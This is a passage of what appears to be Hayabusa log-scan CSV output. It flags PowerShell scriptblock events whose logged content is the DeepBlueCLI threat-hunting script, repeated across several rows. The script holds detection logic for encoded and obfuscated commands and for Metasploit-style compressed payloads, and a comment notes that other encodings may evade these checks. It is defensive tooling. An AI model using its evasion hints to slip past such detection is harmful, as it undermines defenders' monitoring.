malicious command lines including PowerShell. .Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. 
$username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... 
service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. 
$pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ $output += $eventxml.Event.EventData.Data[4].""#text"" $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. 
Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. 
# Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" 
{$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. 
$decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n""",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:44:35.127 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. 
.Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. 
$username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... 
service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. 
$pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ $output += $eventxml.Event.EventData.Data[4].""#text"" $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. 
Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. 
# Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" 
{$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. 
$decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n""",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:44:35.127 +00:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:44:35.127 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"$text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. 
Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . 
Main",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:44:35.127 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"$text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. 
# I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . 
